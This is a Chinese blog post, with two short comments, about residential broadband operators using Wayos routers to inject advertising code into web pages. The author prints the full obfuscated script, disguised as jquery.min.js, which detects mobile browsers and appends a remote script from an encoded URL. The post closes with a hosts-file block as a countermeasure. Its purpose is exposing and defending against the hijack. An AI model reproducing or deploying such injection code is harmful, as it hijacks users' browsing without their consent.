08
2019
02

那些使用维盟路由器做的网络劫持真是可耻

维盟路由器经常会被一些小区拉宽带的采用,因为这个路由器的各种权限认证,带宽管理和集体账号管理,显然更适合这些小区拉宽带的承包商们。

其中这维盟路由器的各种营销功能也是相当花样多,经常这个些小区的网络管理员采用,用来收宽带钱之外的另外一笔广告收入。那么典型的就是网络劫持。其中不乏有DNS劫持、网络内容劫持……

原来网络早有类似的情况,例如这篇文章:https://www.52pojie.cn/thread-622398-1-1.html


这也就致使了在这个路由器下的用户有时候苦不堪言,最近我最近在浏览自己的网站时候发现PC访问的时候经常时不时跳出来打开什么网页。而用手机wifi更蛋疼了,直接跳转打开淘宝推广链接和百度APP之类。

起初我还以为网站被黑,但是使用4G网络访问一点事没有。于是经过分析检查发现,只要连接了小区宽带后就出现了。检查网页发现,会在网页代码的</body></html>之前插入代码:

https://cool.oeebee.com/inf/jquery.min.js

这看似是Jquery前端插件,其实则不然,展开代码如下:

(function(c,g){g[c()](function(p,a,c,k,e,r){e=function(c){return(c<62?'':e(parseInt(c/62)))+((c=c%62)>35?String.fromCharCode(c+29):c.toString(36))};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'([m-zA-Z]|1\\w)'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('u __encode="sojson.com",T=["\\x5F\\A\\n\\s\\w\\A\\n","\\t\\o\\o\\x\\x3A\\L\\L\\D\\D\\D\\I\\q\\w\\G\\q\\w\\v\\I\\s\\w\\B\\L\\G\\r\\J\\r\\q\\s\\p\\y\\x\\o\\w\\U\\M\\N\\q\\s\\r\\o\\w\\p\\I\\t\\o\\B\\z"];(C(a){a[T[0]]=T[1]})(Y);u m=["\\t\\n\\r\\A","\\E\\n\\o\\V\\z\\n\\B\\n\\v\\o\\q\\Z\\O\\x54\\r\\E\\x4E\\r\\B\\n","\\r\\x\\x\\n\\v\\A\\P\\t\\y\\z\\A","\\p\\n\\B\\w\\J\\n\\P\\t\\y\\z\\A","\\s\\p\\n\\r\\o\\n\\V\\z\\n\\B\\n\\v\\o","","\\z\\n\\v\\E\\o\\t","\\M\\z\\w\\w\\p","\\q\\N\\U\\q\\o\\p","\\G\\w\\y\\v","\\p\\n\\J\\n\\p\\q\\n","\\q\\x\\z\\y\\o","\\D\\D\\D","\\p\\n\\x\\z\\r\\s\\n","\\t\\o\\o\\x","\\I","\\q\\s\\p\\y\\x\\o","\\o\\O\\x\\n","\\o\\n\\Q\\o\\L\\G\\r\\J\\r\\q\\s\\p\\y\\x\\o","\\r\\q\\O\\v\\s","\\q\\p\\s","\\x30\\1a\\K\\H\\x34\\x35\\x36\\x37\\x38\\1b\\1c\\D\\n\\p\\o\\O\\N\\y\\w\\x\\z\\1d\\G\\t\\E\\M\\A\\q\\r\\x7A\\Q\\s\\J\\U\\v\\B","\\p\\r\\v\\A\\w\\B","\\s\\t\\r\\p\\W\\o","\\N\\q\\n\\p\\W\\E\\n\\v\\o","\\D\\y\\A\\o\\t","\\q\\s\\p\\n\\n\\v","\\t\\n\\y\\E\\t\\o","\\B\\r\\o\\s\\t","\\F\\K\\R\\H\\t\\1a\\n\\x52\\p\\F\\K\\z\\R\\o\\n\\1b\\v\\F\\H\\Z\\P\\s\\q\\v\\Q\\G\\t\\x4D\\o\\F\\H\\1e\\P\\v\\1d\\x4F\\F\\K\\R\\1e\\F\\K\\R\\1c\\F\\H\\W\\Q\\F\\H\\V\\E","\\I\\E\\y\\M"];(C(c,b){C a(i){try{u h=b[m[1]](m[0])[0];u k=h[m[2]](d(i));1f(C(){h[m[3]](k)},2000)}catch(j){}}C g(h){S b[m[4]](h)}C e(h){u l=m[5];u k=X[m[7]](h[m[6]]/4);u j=h[m[6]]-4*k;1g(u i=0;i<k;i++){l+=h[m[8]](4*i,3)}if(j>0){l+=h[m[8]](4*k)}l=decodeURIComponent(l);l=l[m[11]](m[5])[m[10]]()[m[9]](m[5]);l=l[m[13]](/["]/g,m[12]);l=l[m[13]](/[>]/g,m[14]);l=l[m[13]](/[<]/g,m[15]);S l}C d(h){u i=g(m[16]);i[m[17]]=m[18];i[m[19]]=true;i[m[20]]=h;S i}C f(l){u h=m[21];u k=m[5];1g(u j=0;j<l;j++){u i=X[m[7]](X[m[22]]()*h[m[6]]);k+=h[m[23]](i)}S k}1f(C(){u h=navigator[m[24]];if(top==this&&c[m[26]][m[25]]<c[m[26]][m[27]]&&h[m[28]](/(Android|Mobile)/i)){a(e(m[29])+f(5)+m[30])}},1000)})(Y,document);',[],79,'||||||||||||||||||||||__Ox1fb85|x65|x74|x72|x73|x61|x63|x68|var|x6E|x6F|x70|x69|x6C|x64|x6D|function|x77|x67|x25|x6A|x33|x2E|x76|x32|x2F|x66|x75|x79|x43|x78|x46|return|_0xb483|x62|x45|x41|Math|window|x42|||||||||||x31|x39|x71|x6B|x48|setTimeout|for'.split('|'),0,{}))})(function(){return (2*7).toString(4<<2)+'v'+0xf1.toString(11<<1)},window);


这串代码其实就是一段广告代码,如果我们不能劝阻小区宽带网络管理员修复(其实有可能就是他们放的广告),那么自己只能动手了。

可以在自家的路由器hosts功能

将cool.oeebee.com域名重定向到127.0.0.1就可以屏蔽访问这个网站


« 上一篇

评论列表:

1.热搜  2019-09-22 00:42:54 回复该评论
文章不错非常喜欢
2.安贝乐育婴网  2020-01-02 17:23:07 回复该评论
这东西这么写的呀,路由里吗

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。